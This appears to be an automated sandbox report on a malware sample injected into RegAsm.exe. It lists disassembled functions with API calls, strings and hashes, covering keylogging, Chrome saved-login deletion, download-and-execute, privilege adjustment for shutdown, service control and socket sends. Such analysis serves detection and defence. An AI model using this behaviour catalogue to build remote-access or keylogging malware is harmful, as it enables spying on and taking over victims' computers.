                                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                        • String ID:
                                                        • API String ID: 2341273852-0
                                                        • Opcode ID: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                                        • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                        • Opcode Fuzzy Hash: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                                        • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                        Function 00419B86 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                          • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Find$CreateFirstNext
                                                        • String ID: 8SG$PXG$PXG$NG$PG
                                                        • API String ID: 341183262-3812160132
                                                        • Opcode ID: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
                                                        • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                        • Opcode Fuzzy Hash: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
                                                        • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                        Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                        • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                        • GetLastError.KERNEL32 ref: 0040A328
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        • GetMessageA.USER32 ref: 0040A376
                                                        • TranslateMessage.USER32(?), ref: 0040A385
                                                        • DispatchMessageA.USER32 ref: 0040A390
                                                        Strings
                                                        • Keylogger initialization failure: error , xrefs: 0040A33C
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                        • String ID: Keylogger initialization failure: error
                                                        • API String ID: 3219506041-952744263
                                                        • Opcode ID: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                                        • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                        • Opcode Fuzzy Hash: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                                        • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                        Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                        • String ID:
                                                        • API String ID: 1888522110-0
                                                        • Opcode ID: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                                        • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                        • Opcode Fuzzy Hash: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                                        • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                        Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                        • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                                        • API String ID: 2127411465-314212984
                                                        • Opcode ID: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
                                                        • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                        • Opcode Fuzzy Hash: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
                                                        • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                        Function 00449210 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00449292
                                                        • _free.LIBCMT ref: 004492B6
                                                        • _free.LIBCMT ref: 0044943D
                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                        • _free.LIBCMT ref: 00449609
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                        • String ID:
                                                        • API String ID: 314583886-0
                                                        • Opcode ID: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                                        • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                        • Opcode Fuzzy Hash: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                                        • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                        Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                          • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                          • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                          • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                          • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                        • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                        • String ID: !D@$PowrProf.dll$SetSuspendState
                                                        • API String ID: 1589313981-2876530381
                                                        • Opcode ID: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                                        • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                        • Opcode Fuzzy Hash: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                                        • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                        Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                        • GetLastError.KERNEL32 ref: 0040BA93
                                                        Strings
                                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                        • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                        • UserProfile, xrefs: 0040BA59
                                                        • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteErrorFileLast
                                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                        • API String ID: 2018770650-1062637481
                                                        • Opcode ID: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                                        • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                        • Opcode Fuzzy Hash: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                                        • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                        Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                        • GetLastError.KERNEL32 ref: 004179D8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                        • String ID: SeShutdownPrivilege
                                                        • API String ID: 3534403312-3733053543
                                                        • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                        • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                        • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                        • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                        Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00409293
                                                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                        • FindClose.KERNEL32(00000000), ref: 004093FC
                                                          • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                                          • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                                          • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                        • FindClose.KERNEL32(00000000), ref: 004095F4
                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                        • String ID:
                                                        • API String ID: 1824512719-0
                                                        • Opcode ID: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                                        • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                        • Opcode Fuzzy Hash: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                                        • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                        Function 00446270 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 464COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FSE$FSE$PkGNG
                                                        • API String ID: 0-1266307253
                                                        • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                        • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                                        • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                        • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                                        Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                                        • String ID:
                                                        • API String ID: 276877138-0
                                                        • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                                        • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                        • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                                        • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                        Function 0040F7E2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00413584: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004135A4
                                                          • Part of subcall function 00413584: RegQueryValueExA.ADVAPI32 ref: 004135C2
                                                          • Part of subcall function 00413584: RegCloseKey.ADVAPI32(00000000), ref: 004135CD
                                                        • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                        • ExitProcess.KERNEL32 ref: 0040F905
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                                        • String ID: 5.1.1 Pro$override$pth_unenc
                                                        • API String ID: 2281282204-2344886030
                                                        • Opcode ID: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                                        • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                        • Opcode Fuzzy Hash: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                                        • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                        Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                        • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoLocale
                                                        • String ID: ACP$OCP
                                                        • API String ID: 2299586839-711371036
                                                        • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                        • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                        • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                        • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                        Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindResourceA.KERNEL32 ref: 0041B54A
                                                        • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                        • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                        • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Resource$FindLoadLockSizeof
                                                        • String ID: SETTINGS
                                                        • API String ID: 3473537107-594951305
                                                        • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                        • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                        • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                        • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                        Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 004096A5
                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstH_prologNext
                                                        • String ID:
                                                        • API String ID: 1157919129-0
                                                        • Opcode ID: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                                        • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                        • Opcode Fuzzy Hash: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                                        • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                        Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 0040884C
                                                        • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                        • String ID:
                                                        • API String ID: 1771804793-0
                                                        • Opcode ID: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                        • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                        • Opcode Fuzzy Hash: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                        • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                        Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DownloadExecuteFileShell
                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                        • API String ID: 2825088817-3056885514
                                                        • Opcode ID: 25f93c1eb8c7c2b3408b92261e90d72d92bad6cdb28d287bebca9ae006ad5217
                                                        • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                        • Opcode Fuzzy Hash: 25f93c1eb8c7c2b3408b92261e90d72d92bad6cdb28d287bebca9ae006ad5217
                                                        • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                        Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileFind$FirstNextsend
                                                        • String ID: XPG$XPG
                                                        • API String ID: 4113138495-1962359302
                                                        • Opcode ID: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                                        • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                        • Opcode Fuzzy Hash: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                                        • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                        Function 0045201B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                        • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                        • String ID: p'E$JD
                                                        • API String ID: 1084509184-908320845
                                                        • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                        • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                        • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                        • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                        Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
